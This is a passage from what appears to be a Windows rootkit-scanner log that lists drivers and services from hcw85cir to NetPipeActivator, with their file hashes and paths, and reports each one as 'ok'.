09:21:44.0101 0x0304  [ C44E3C2BAB6837DB337DDEE7544736DB, 88A24FF7D2FECCEAFFD421B2039A0FB623DA47A6B220B80EF1E52DD26D9E222D ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
09:21:44.0101 0x0304  hcw85cir - ok
09:21:44.0148 0x0304  [ A5EF29D5315111C80A5C1ABAD14C8972, A181DA72E946F121C3F4A19438C547B0BFD15138AB1DB5465945EC89DF1F6B0A ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
09:21:44.0167 0x0304  HdAudAddService - ok
09:21:44.0199 0x0304  [ 9036377B8A6C15DC2EEC53E489D159B5, 1E56D2ACFE92E6DF96D755B05C63D580EED82C210F075C8623E138BEE6BCD41B ] HDAudBus        C:\Windows\system32\drivers\HDAudBus.sys
09:21:44.0199 0x0304  HDAudBus - ok
09:21:44.0215 0x0304  [ 88A67C34E37186665E916FD347B50D19, 23C4F11E421DE7D8330418118524D345A905300816E3D7D486DB18C670226EE1 ] HECI            C:\Windows\system32\DRIVERS\HECI.sys
09:21:44.0215 0x0304  HECI - ok
09:21:44.0246 0x0304  [ 1D58A7F3E11A9731D0EAAAA8405ACC36, 7056FA18B86FBD52C4A6092D80476C02553EA053D6A0BEDB01A2FA5E152D5215 ] HidBatt         C:\Windows\system32\DRIVERS\HidBatt.sys
09:21:44.0246 0x0304  HidBatt - ok
09:21:44.0261 0x0304  [ 89448F40E6DF260C206A193A4683BA78, 71E0FCC32AE6FF8DFF420DB0383D6A200E1EAE14BD2E32453F92CE18B31C1F3C ] HidBth          C:\Windows\system32\DRIVERS\hidbth.sys
09:21:44.0261 0x0304  HidBth - ok
09:21:44.0279 0x0304  [ CF50B4CF4A4F229B9F3C08351F99CA5E, B97843620AF80FF0EC8F2C438255C0A42A756C6314FAF3DEF415DE16E14C108F ] HidIr           C:\Windows\system32\DRIVERS\hidir.sys
09:21:44.0279 0x0304  HidIr - ok
09:21:44.0283 0x0304  [ 2BC6F6A1992B3A77F5F41432CA6B3B6B, 2AF3312F1C8C8923C0A29AA5DAE57CE269417E53DEA2F0CCCC8DB57029698FE1 ] hidserv         C:\Windows\System32\hidserv.dll
09:21:44.0299 0x0304  hidserv - ok
09:21:44.0330 0x0304  [ 10C19F8290891AF023EAEC0832E1EB4D, E208553029488A6EE2F5216CC9FE5F93E9931A94C0D0625253BB159E30642853 ] HidUsb          C:\Windows\system32\drivers\hidusb.sys
09:21:44.0330 0x0304  HidUsb - ok
09:21:44.0361 0x0304  [ 196B4E3F4CCCC24AF836CE58FACBB699, 7A2E1F603A073421FA0987EFB96647F1F0F2D4E0C82AA62EBC041585DA811DAF ] hkmsvc          C:\Windows\system32\kmsvc.dll
09:21:44.0361 0x0304  hkmsvc - ok
09:21:44.0377 0x0304  [ 6658F4404DE03D75FE3BA09F7ABA6A30, E51D9C1580A283EB862F09B73AAE1B647DD683A53F3DD99834222F12DD15E40F ] HomeGroupListener C:\Windows\system32\ListSvc.dll
09:21:44.0377 0x0304  HomeGroupListener - ok
09:21:44.0423 0x0304  [ DBC02D918FFF1CAD628ACBE0C0EAA8E8, 02121800D9062692C102475876AE8143EBE46D855E8328B8CDCFE6A2F0D19696 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
09:21:44.0423 0x0304  HomeGroupProvider - ok
09:21:44.0499 0x0304  [ 2A8B93A01621E100A578E83C768AFA2C, 6637D260AF180D1F200D219796FCE6D524FC6BF57C0CEEF9E1B3616E85865AD1 ] HP Support Assistant Service C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe
09:21:44.0499 0x0304  HP Support Assistant Service - ok
09:21:44.0561 0x0304  [ D2946D9F020AE76E9CEF9B4A6DF838C0, C29CE594879385DA12B8EAA90B258905827B613839CCD820DE49215B68676995 ] hpqwmiex        C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
09:21:44.0586 0x0304  hpqwmiex - ok
09:21:44.0637 0x0304  [ 295FDC419039090EB8B49FFDBB374549, 670E8015FD374640C6570F56F7FE8DE4D8F92E7A8072F5D1B2B95D0BD699CEF7 ] HpSAMD          C:\Windows\system32\drivers\HpSAMD.sys
09:21:44.0639 0x0304  HpSAMD - ok
09:21:44.0690 0x0304  [ 871917B07A141BFF43D76D8844D48106, 30C702008D0EE57D63F74864967DD19A55A268E77E42B5B3CC73037AD51D2987 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
09:21:44.0703 0x0304  HTTP - ok
09:21:44.0753 0x0304  [ 0C4E035C7F105F1299258C90886C64C5, CFB4FBE7B28058E6D3E6E508CF3C1645F6AAE0AFEB4C5364835B9C42311DF0D4 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
09:21:44.0754 0x0304  hwpolicy - ok
09:21:44.0804 0x0304  [ F151F0BDC47F4A28B1B20A0818EA36D6, 84B24B5796D9F70A8C37773F5484A4606CC7908370CCD942627ACBEDC4952D79 ] i8042prt        C:\Windows\system32\drivers\i8042prt.sys
09:21:44.0806 0x0304  i8042prt - ok
09:21:44.0852 0x0304  [ D483687EACE0C065EE772481A96E05F5, A22200E90C78DFE73FE0FBEED5331AB43CD7133651FD125595C4DB604AD71B29 ] iaStor          C:\Windows\system32\drivers\iastor.sys
09:21:44.0858 0x0304  iaStor - ok
09:21:44.0884 0x0304  [ 5CD5F9A5444E6CDCB0AC89BD62D8B76E, 72870092A80C6DAE0105025B0ED8B607E98BA81E59298364A7FE4C9C56C68FF0 ] iaStorV         C:\Windows\system32\drivers\iaStorV.sys
09:21:44.0886 0x0304  iaStorV - ok
09:21:44.0946 0x0304  [ 3E9213A2A050BF429E91898C90F8B4E3, D80ABE5691087661B19F01927B631CB8C5291120B814B6F863F046E0D643E9E4 ] idsvc           C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
09:21:44.0959 0x0304  idsvc - ok
09:21:44.0983 0x0304  IEEtwCollectorService - ok
09:21:45.0245 0x0304  [ 8266AE06DF974E5BA047B3E9E9E70B3F, 44E5A8EED802A1DDF3CCDB478A88A3AB3CF009F449FB11E0F94A28498342B4E2 ] igfx            C:\Windows\system32\DRIVERS\igdkmd32.sys
09:21:45.0383 0x0304  igfx - ok
09:21:45.0448 0x0304  [ 4173FF5708F3236CF25195FECD742915, 0A9C0701DF6EAC6602BE342FC13C7950EF04BB5BDF7D96C2C5DABBD2A29AA55D ] iirsp           C:\Windows\system32\DRIVERS\iirsp.sys
09:21:45.0449 0x0304  iirsp - ok
09:21:45.0502 0x0304  [ B9C54120F46392100478F58F374E5709, A28EE8B0988F580D5984E815FC78DF41B169260814234AA0E453375542D0957B ] IKEEXT          C:\Windows\System32\ikeext.dll
09:21:45.0509 0x0304  IKEEXT - ok
09:21:45.0605 0x0304  [ D0A6C0CEB3B74A91884F804FF4F031C0, 86F1839A466A745FBB0607949C5715E441F4296F610A8E44DB6AD2F104F3A38C ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHDA.sys
09:21:45.0636 0x0304  IntcAzAudAddService - ok
09:21:45.0683 0x0304  [ A0F12F2C9BA6C72F3987CE780E77C130, 5F53DF8BE1621AA7DFB655CFD9C95E0AFA1AD3CE2E290E19D7B7FB3C6E380034 ] intelide        C:\Windows\system32\drivers\intelide.sys
09:21:45.0683 0x0304  intelide - ok
09:21:45.0714 0x0304  [ 3B514D27BFC4ACCB4037BC6685F766E0, F12D7AC62F8550E6F33B28AD751D8413AB7FFEF963242D99FFA76CE8A48B027A ] intelppm        C:\Windows\system32\DRIVERS\intelppm.sys
09:21:45.0714 0x0304  intelppm - ok
09:21:45.0783 0x0304  [ ACB364B9075A45C0736E5C47BE5CAE19, 202F77C659103D2D0E787B8CB0A23BE32EA5AA2E6B3B0A0F0A8DFA906AB3C0C0 ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
09:21:45.0783 0x0304  IPBusEnum - ok
09:21:45.0798 0x0304  [ 709D1761D3B19A932FF0238EA6D50200, 0A9D2C3A6E91CA45540555B40CB4E2DF3EBE98C1D164C4EECEE20C86782F5823 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
09:21:45.0798 0x0304  IpFilterDriver - ok
09:21:45.0845 0x0304  [ 58F67245D041FBE7AF88F4EAF79DF0FA, 67468D6A46FF4D87AD321BFEA42F2FC843D09AA292A119C76D4D795D06028F96 ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
09:21:45.0845 0x0304  iphlpsvc - ok
09:21:45.0882 0x0304  [ 4BD7134618C1D2A27466A099062547BF, 20284ABEF4433A59E2981F4143CAEC67DC990864FE0B9E3DC70EE0B88539E964 ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
09:21:45.0882 0x0304  IPMIDRV - ok
09:21:45.0898 0x0304  [ A5FA468D67ABCDAA36264E463A7BB0CD, EDB828D596E43372F97DAE1AADA46428C4C45FB80646DDC64FAD5F25C826CF63 ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
09:21:45.0898 0x0304  IPNAT - ok
09:21:45.0914 0x0304  [ 42996CFF20A3084A56017B7902307E9F, 688176DAB91BE569280E4822E4C5BDE755794D293591C53F8047AD59C441751D ] IRENUM          C:\Windows\system32\drivers\irenum.sys
09:21:45.0929 0x0304  IRENUM - ok
09:21:45.0929 0x0304  [ 1F32BB6B38F62F7DF1A7AB7292638A35, 86522358680FBB1CEBC56B4D139290689BB0F71A3EC78CE883E4D75D0B37586F ] isapnp          C:\Windows\system32\drivers\isapnp.sys
09:21:45.0929 0x0304  isapnp - ok
09:21:45.0960 0x0304  [ EB34CE31FABD4DC4343FD2AD16D2CAF9, D21C91227A15DA89ECF522345D0AB80B3B7FC24A230596DABDB8BD3B7554CE8C ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
09:21:45.0978 0x0304  iScsiPrt - ok
09:21:45.0999 0x0304  [ 213822072085B5BBAD9AF30AB577D817, 2C373B804D840933EC3A5F3ABFC43E47C2636CDB2431AB51846C565077B7C468 ] IviRegMgr       C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
09:21:46.0014 0x0304  IviRegMgr - ok
09:21:46.0030 0x0304  [ ADEF52CA1AEAE82B50DF86B56413107E, A3AE1E96B04AC81665ABBD3CB267DFB3F78376DAE18FB0DBD447908DDAAA22D2 ] kbdclass        C:\Windows\system32\drivers\kbdclass.sys
09:21:46.0030 0x0304  kbdclass - ok
09:21:46.0077 0x0304  [ 9E3CED91863E6EE98C24794D05E27A71, 90CF59F20E14E4A5A793266805E82BF7AE1F0CF4C7BAB1FD2EEF3B53C5DF770F ] kbdhid          C:\Windows\system32\drivers\kbdhid.sys
09:21:46.0077 0x0304  kbdhid - ok
09:21:46.0084 0x0304  [ DD17E1573651293D4ED31053795B3471, 94F7D1BB1C3B0C1FAAEED07375DB0F3BC995394FB5C26983548D946C8D229D54 ] KeyIso          C:\Windows\system32\lsass.exe
09:21:46.0084 0x0304  KeyIso - ok
09:21:46.0115 0x0304  [ 4120DA10AA42A9996F4575DB9E3E6E6E, 1C6E790772EA327ACB885D731A030408160534997DD56FEE4D6CEE6929873BB8 ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
09:21:46.0115 0x0304  KSecDD - ok
09:21:46.0130 0x0304  [ D3964885F0A11ACF51DA3AAA776973B2, 417ED5A3201FC50FBC0D646F8F2114A1E8A91E7919A62508DCBC156C0BFB2FBA ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
09:21:46.0130 0x0304  KSecPkg - ok
09:21:46.0162 0x0304  [ 89A7B9CC98D0D80C6F31B91C0A310FCD, 4583CAEEE0D50C0C7CE955E533FDA063CDC37B69033D41EF22EF1BA242E4C747 ] KtmRm           C:\Windows\system32\msdtckrm.dll
09:21:46.0162 0x0304  KtmRm - ok
09:21:46.0184 0x0304  [ D64AF876D53ECA3668BB97B51B4E70AB, D5C07C019BFEAFBEDC29AB5060356A3B07449712B21B50E03378BEF04AF180F9 ] LanmanServer    C:\Windows\System32\srvsvc.dll
09:21:46.0184 0x0304  LanmanServer - ok
09:21:46.0231 0x0304  [ 58405E4F68BA8E4057C6E914F326ABA2, C3E6519A1A38F1B3597D4391E42ABFE8F1F5E86256C4B3BD876CDAD9BB68B0A6 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
09:21:46.0231 0x0304  LanmanWorkstation - ok
09:21:46.0262 0x0304  [ F7611EC07349979DA9B0AE1F18CCC7A6, 879AA7A391966F00761CA039C25EBC62F6712DD5461694911EEC673E12DE103E ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
09:21:46.0262 0x0304  lltdio - ok
09:21:46.0293 0x0304  [ 5700673E13A2117FA3B9020C852C01E2, 6684A2905EE8C438F2A64BE47E51A54D287B08DEFB8E0AE7FC2809D845EE3C5F ] lltdsvc         C:\Windows\System32\lltdsvc.dll
09:21:46.0309 0x0304  lltdsvc - ok
09:21:46.0325 0x0304  [ 55CA01BA19D0006C8F2639B6C045E08B, 4DBBDC820C514DB18CC13F8EE178F8C4E39C295C6E3C255416C235553CE7BDC1 ] lmhosts         C:\Windows\System32\lmhsvc.dll
09:21:46.0325 0x0304  lmhosts - ok
09:21:46.0356 0x0304  [ 2763A02188FFB04287F5034EC5B6B451, 679C9316FC101A9135D788BC3D910F3EF4146AF56D97143149D1767F581535F7 ] LMS             C:\Program Files\Intel\AMT\LMS.exe
09:21:46.0356 0x0304  LMS - ok
09:21:46.0382 0x0304  [ EB119A53CCF2ACC000AC71B065B78FEF, 1FD60735C4945AE565C223F0B47EAF9602D8777E3D15600914C1A9D761215AF9 ] LSI_FC          C:\Windows\system32\DRIVERS\lsi_fc.sys
09:21:46.0384 0x0304  LSI_FC - ok
09:21:46.0400 0x0304  [ 8ADE1C877256A22E49B75D1CC9161F9C, 3D64F233DC866537E50549A7C1A2B40A954055B22F0BDA39825B04C38C607CB7 ] LSI_SAS         C:\Windows\system32\DRIVERS\lsi_sas.sys
09:21:46.0400 0x0304  LSI_SAS - ok
09:21:46.0416 0x0304  [ DC9DC3D3DAA0E276FD2EC262E38B11E9, A264990857CBC74036799E17A087130626C0A09BE19879019BAF2D761C62AECC ] LSI_SAS2        C:\Windows\system32\DRIVERS\lsi_sas2.sys
09:21:46.0416 0x0304  LSI_SAS2 - ok
09:21:46.0431 0x0304  [ 0A036C7D7CAB643A7F07135AC47E0524, 2F662D07FCB74B8D493156DB555EAA90A47E93CF14C7B30039D2FE47EB8682B8 ] LSI_SCSI        C:\Windows\system32\DRIVERS\lsi_scsi.sys
09:21:46.0431 0x0304  LSI_SCSI - ok
09:21:46.0462 0x0304  [ 6703E366CC18D3B6E534F5CF7DF39CEE, 7396B9AF938284D99EC51206A7B2FA4A0DC10A493DCE6707818B03A7473782C4 ] luafv           C:\Windows\system32\drivers\luafv.sys
09:21:46.0462 0x0304  luafv - ok
09:21:46.0515 0x0304  [ 8E2E9CCD873ABF180F48BCAEEEBE347D, 35DBBB8E63B480151EA5701D9DB7C90642FA2391D044DB400D3644F3E21BB0C1 ] MBAMSwissArmy   C:\Windows\system32\drivers\MBAMSwissArmy.sys
09:21:46.0515 0x0304  MBAMSwissArmy - ok
09:21:46.0546 0x0304  [ 823746F78213054E90AB2FFB316D9925, FAD5188855D43C7EF457E193A28BF2A5F87EF442156C2F8059EC9DD44EF78FBF ] McShield        C:\PROGRA~1\McAfee\MANAGE~1\VScan\McShield.exe
09:21:46.0546 0x0304  McShield - ok
09:21:46.0583 0x0304  [ BFB9EE8EE977EFE85D1A3105ABEF6DD1, D2A84EBF0C0B7A14AD432FD2EF43CC12300027AEA3FA4075659FB088AB62B588 ] Mcx2Svc         C:\Windows\system32\Mcx2Svc.dll
09:21:46.0599 0x0304  Mcx2Svc - ok
09:21:46.0614 0x0304  [ 0FFF5B045293002AB38EB1FD1FC2FB74, 49071B565FD5B2DE43EC00D8518C3BE70843F38919E82F13104B8C1FAFB20374 ] megasas         C:\Windows\system32\DRIVERS\megasas.sys
09:21:46.0614 0x0304  megasas - ok
09:21:46.0630 0x0304  [ DCBAB2920C75F390CAF1D29F675D03D6, 85C3A7A010BEA5E3C6179161B295F2CB900A6A214833A5F87A4327392880E2BB ] MegaSR          C:\Windows\system32\DRIVERS\MegaSR.sys
09:21:46.0645 0x0304  MegaSR - ok
09:21:46.0678 0x0304  [ 64B96DE8C492BD435372D9130A535F1D, B253682F140CD548489AE6CD2EC281C382E8D3C4C3BE9A423DFEB963E37D665C ] MfeAVFK         C:\Windows\system32\drivers\MfeAVFK.sys
09:21:46.0680 0x0304  MfeAVFK - ok
09:21:46.0683 0x0304  [ 078E87A89D36CC3516F19D5FB518BDDC, 09C80B948D638D67805EA21CFC9C8FE29685BBDE167385248CD763F9E1C9A1F4 ] MfeBOPK         C:\Windows\system32\drivers\MfeBOPK.sys
09:21:46.0683 0x0304  MfeBOPK - ok
09:21:46.0698 0x0304  [ 168C565101FD5B9DB694EFDEC91FAFA9, 1F7E469BDE079C85EE6CB6F02423E4F93C5FE373BDEA5CCD62173AA31934AFB4 ] mfehidk         C:\Windows\system32\drivers\mfehidk.sys
09:21:46.0714 0x0304  mfehidk - ok
09:21:46.0714 0x0304  [ E0842F67DC9BC4D21D1E319610EBE9E5, 7FEBA23EDA99D092775AE8F41AE0B5812C6C6CB95DAB387FF5845FE6113B1E40 ] MfeRKDK         C:\Windows\system32\drivers\MfeRKDK.sys
09:21:46.0729 0x0304  MfeRKDK - ok
09:21:46.0783 0x0304  [ 43A7ACBBD70ECD62F0B63486C72089A3, 2A50971FF6C42A63857B5972E4CF01E9632A5B7E3149A395446F9CB72A19C987 ] mfetdik         C:\Windows\system32\drivers\mfetdik.sys
09:21:46.0783 0x0304  mfetdik - ok
09:21:46.0799 0x0304  [ 146B6F43A673379A3C670E86D89BE5EA, C4412DCF80DE6B55466F399413271364F14BC0819C224AA161EDDC31A9775440 ] MMCSS           C:\Windows\system32\mmcss.dll
09:21:46.0799 0x0304  MMCSS - ok
09:21:46.0814 0x0304  [ F001861E5700EE84E2D4E52C712F4964, F4DC5AEED6F34D76CCEF360862CC47EF71097BE0813C8CE04EE5F0DB387DFFAE ] Modem           C:\Windows\system32\drivers\modem.sys
09:21:46.0830 0x0304  Modem - ok
09:21:46.0846 0x0304  [ 79D10964DE86B292320E9DFE02282A23, 52714827B7EEDACA55326A4E4F6158D4942DFAA3BACDE303A2F569BF3F4FAA72 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
09:21:46.0846 0x0304  monitor - ok
09:21:46.0881 0x0304  [ FB18CC1D4C2E716B6B903B0AC0CC0609, F10CCA63493782B16DE6B96B94A27078DBE68AECEF34FDF840CFF86D2C6E3C5E ] mouclass        C:\Windows\system32\drivers\mouclass.sys
09:21:46.0882 0x0304  mouclass - ok
09:21:46.0884 0x0304  [ 2C388D2CD01C9042596CF3C8F3C7B24D, B2FB72272BB01AEDA4047B57C943B7E9BD8A6497854F8CC34672AAA592D0A703 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
09:21:46.0884 0x0304  mouhid - ok
09:21:46.0915 0x0304  [ FC8771F45ECCCFD89684E38842539B9B, 806DDF2B4830CA866582FE74A521BB7DF26CA0E19013DAF584D3677FB48CC77A ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
09:21:46.0915 0x0304  mountmgr - ok
09:21:46.0962 0x0304  [ 2D699FB6E89CE0D8DA14ECC03B3EDFE0, D3D903EEA465D77345AAC9B9F02CDEADF4831212EA2DE4FCA33BEE26EBB47420 ] mpio            C:\Windows\system32\drivers\mpio.sys
09:21:46.0962 0x0304  mpio - ok
09:21:46.0998 0x0304  [ AD2723A7B53DD1AACAE6AD8C0BFBF4D0, 1D6DCFA0E56C3E55B6AED819176E751502F863BA0FCF4F0B3253A81D208141A2 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
09:21:46.0998 0x0304  mpsdrv - ok
09:21:47.0045 0x0304  [ 9835584E999D25004E1EE8E5F3E3B881, 71798B0CBE9AE69F1F29B845319019C69EC7F415CBABB3B87DDE92C360675021 ] MpsSvc          C:\Windows\system32\mpssvc.dll
09:21:47.0045 0x0304  MpsSvc - ok
09:21:47.0083 0x0304  [ 21F4B24ACFC79A483515BD986DD9043F, 22681907E02E0B723ABE2CEF0602D36C8EF862E7E2B62A9B40A5EF582E58D7BA ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
09:21:47.0083 0x0304  MRxDAV - ok
09:21:47.0114 0x0304  [ 5D16C921E3671636C0EBA3BBAAC5FD25, 5BC107B95CAFC88F51FBB9F657B99944B20627A2B618F263093D7045E4FFD65C ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
09:21:47.0130 0x0304  mrxsmb - ok
09:21:47.0161 0x0304  [ 6D17A4791ACA19328C685D256349FEFC, 012AA3D84EEAAF53780D06D2D11B9727DFC3441F3FAD75BC9E751FB814403668 ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
09:21:47.0161 0x0304  mrxsmb10 - ok
09:21:47.0183 0x0304  [ B81F204D146000BE76651A50670A5E9E, 78193D0F967BE9829E53F9B500342934B4B1E1F4CEFC444382959E2061BC3B17 ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
09:21:47.0183 0x0304  mrxsmb20 - ok
09:21:47.0214 0x0304  [ 012C5F4E9349E711E11E0F19A8589F0A, 208B92DFCF7AD43202660FBBC9FF5E03AEDBEE38178FF3628EB74CB6CD37C584 ] msahci          C:\Windows\system32\drivers\msahci.sys
09:21:47.0214 0x0304  msahci - ok
09:21:47.0229 0x0304  [ 55055F8AD8BE27A64C831322A780A228, C2C9FD1F61302997117B1CD0835E8234405BB80084065ED05363B77868397304 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
09:21:47.0229 0x0304  msdsm - ok
09:21:47.0245 0x0304  [ E1BCE74A3BD9902B72599C0192A07E27, 5162EB623FE64E9DFEAC6CA2410EFA1314E62EC13207FFBFED2D61AA887603C4 ] MSDTC           C:\Windows\System32\msdtc.exe
09:21:47.0245 0x0304  MSDTC - ok
09:21:47.0299 0x0304  [ DAEFB28E3AF5A76ABCC2C3078C07327F, 6EB558532400B489763BAE7203538DE5F196282A8CB46A1B31D59120FC5AFCEF ] Msfs            C:\Windows\system32\drivers\Msfs.sys
09:21:47.0299 0x0304  Msfs - ok
09:21:47.0299 0x0304  [ 3E1E5767043C5AF9367F0056295E9F84, B2EDFECD3C14E4FE1BA87D9A86334043A9BD696A554EBD186DA7EAEB2EBD4F70 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
09:21:47.0299 0x0304  mshidkmdf - ok
09:21:47.0346 0x0304  [ 0A4E5757AE09FA9622E3158CC1AEF114, ED574E420E57374E328C7C526504ECA569C164287966F06019EC207CB17F2C54 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
09:21:47.0346 0x0304  msisadrv - ok
09:21:47.0377 0x0304  [ 90F7D9E6B6F27E1A707D4A297F077828, BEFC220EAA7307849600748842ACB9254A6A91158812D9B23EFAF912C498BA7F ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
09:21:47.0377 0x0304  MSiSCSI - ok
09:21:47.0377 0x0304  msiserver - ok
09:21:47.0423 0x0304  [ 8C0860D6366AAFFB6C5BB9DF9448E631, 949C5A14E57F2D7385543C17C3485E7ADE36EA2016F6E0A1866571D2EDE90A77 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
09:21:47.0424 0x0304  MSKSSRV - ok
09:21:47.0443 0x0304  [ 3EA8B949F963562CEDBB549EAC0C11CE, 1B0B2F16A1790282504F3C548D47C3281EFB440D5D9711A1EF76D6371B768D2D ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
09:21:47.0443 0x0304  MSPCLOCK - ok
09:21:47.0459 0x0304  [ F456E973590D663B1073E9C463B40932, 48BA6D5580EE7B6A4C06E04772FD35B51779553FC0DD6C5C30DD8B5DEEB25B11 ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
09:21:47.0460 0x0304  MSPQM - ok
09:21:47.0479 0x0304  [ 0E008FC4819D238C51D7C93E7B41E560, 141FCEBDD05874407EAEC35A9DCD3BB16F2A428F23E55487D6A5DBFCADBF10D2 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
09:21:47.0482 0x0304  MsRPC - ok
09:21:47.0500 0x0304  [ FC6B9FF600CC585EA38B12589BD4E246, F05DB01AE1955D2468CE6B51E51998B111CA3B0BDEED090EE6B99B625CBA564A ] mssmbios        C:\Windows\system32\drivers\mssmbios.sys
09:21:47.0515 0x0304  mssmbios - ok
09:21:47.0531 0x0304  [ B42C6B921F61A6E55159B8BE6CD54A36, 6BB0A7BE005B8F281E551D1B8046CE4202372BC7AE0161881C858BFAC675FE1C ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
09:21:47.0531 0x0304  MSTEE - ok
09:21:47.0557 0x0304  [ 33599130F44E1F34631CEA241DE8AC84, E15B31D1AFDC8DC6D2B21D4215796A99ECC69EEDBB06CEED01AECC3C99A44C8B ] MTConfig        C:\Windows\system32\DRIVERS\MTConfig.sys
09:21:47.0558 0x0304  MTConfig - ok
09:21:47.0570 0x0304  [ 159FAD02F64E6381758C990F753BCC80, E55AB01DCFA95ECAB24A2A9656E28FF9D064BA08B3D82DC8AA42F5991BA09598 ] Mup             C:\Windows\system32\Drivers\mup.sys
09:21:47.0571 0x0304  Mup - ok
09:21:47.0606 0x0304  [ 9851A02617A77CE62F0E6C7D0BDD0701, D46C65FC4AE6F38F20AE4C445DD15D810F96FB8202960100791B170078EF2F55 ] myAgtSvc        C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe
09:21:47.0609 0x0304  myAgtSvc - ok
09:21:47.0652 0x0304  [ 61D57A5D7C6D9AFE10E77DAE6E1B445E, D252248532142E9E2332DA693BC51B795102CA938B568FF04981E98B19BFBC5C ] napagent        C:\Windows\system32\qagentRT.dll
09:21:47.0658 0x0304  napagent - ok
09:21:47.0698 0x0304  [ 26384429FCD85D83746F63E798AB1480, 957C115C263A4B4DC854558B43ECE632D8E2BCCB744E23A01EBA7476BA2E7FFB ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
09:21:47.0698 0x0304  NativeWifiP - ok
09:21:47.0799 0x0304  [ 8C9C922D71F1CD4DEF73F186416B7896, 15FF43CD90C7913F83B35F2E7986561584588E8A45196EBD965C3A355836A9C7 ] NDIS            C:\Windows\system32\drivers\ndis.sys
09:21:47.0814 0x0304  NDIS - ok
09:21:47.0830 0x0304  [ 0E1787AA6C9191D3D319E8BAFE86F80C, F535022747355B2C66424BDA892D7DCB820C2EB8EE05BAE5BC6D1B1D65186278 ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
09:21:47.0830 0x0304  NdisCap - ok
09:21:47.0846 0x0304  [ E4A8AEC125A2E43A9E32AFEEA7C9C888, 6EA181117126FC70B3C1DD1AC73CC26D1603A2CF49E47F66623E2C9489C49B55 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
09:21:47.0846 0x0304  NdisTapi - ok
09:21:47.0883 0x0304  [ D8A65DAFB3EB41CBB622745676FCD072, 874D3C3D247C4A309DA813DB1D2EDB0037D3C489824BD5FE95B0C20699764EF7 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
09:21:47.0883 0x0304  Ndisuio - ok
09:21:47.0930 0x0304  [ 38FBE267E7E6983311179230FACB1017, CFD1CBCA59650795C030DB30E5795B37C11C736E14003AE1DAB081BA5C0C9B14 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
09:21:47.0930 0x0304  NdisWan - ok
09:21:47.0961 0x0304  [ A4BDC541E69674FBFF1A8FF00BE913F2, 18CCFD063E9870B8B6958715BC0414C4D920AE63528EA1E9D7E30F7138918FFA ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
09:21:47.0961 0x0304  NDProxy - ok
09:21:47.0979 0x0304  [ 80B275B1CE3B0E79909DB7B39AF74D51, 75B406B0D9D28239D4EB2A298419A5F78A58237D88C5FD688EF1DFFAFACCF796 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
09:21:47.0980 0x0304  NetBIOS - ok
09:21:48.0015 0x0304  [ 280122DDCF04B378EDD1AD54D71C1E54, F98B2ADE34F7E67C7C06C1D0FFB80ECBC353D044D4B4784CD952910345DC2ED0 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
09:21:48.0015 0x0304  NetBT - ok
09:21:48.0030 0x0304  [ DD17E1573651293D4ED31053795B3471, 94F7D1BB1C3B0C1FAAEED07375DB0F3BC995394FB5C26983548D946C8D229D54 ] Netlogon        C:\Windows\system32\lsass.exe
09:21:48.0030 0x0304  Netlogon - ok
09:21:48.0061 0x0304  [ 7CCCFCA7510684768DA22092D1FA4DB2, BB9E4F8FABBF596D888E6D303CB54A336D9DFF95B36AEA9369D2ED787DDC4B5D ] Netman          C:\Windows\System32\netman.dll
09:21:48.0061 0x0304  Netman - ok
09:21:48.0114 0x0304  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:21:48.0130 0x0304  NetMsmqActivator - ok
09:21:48.0145 0x0304  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:21:48.0161 0x0304  NetPipeActivator - ok
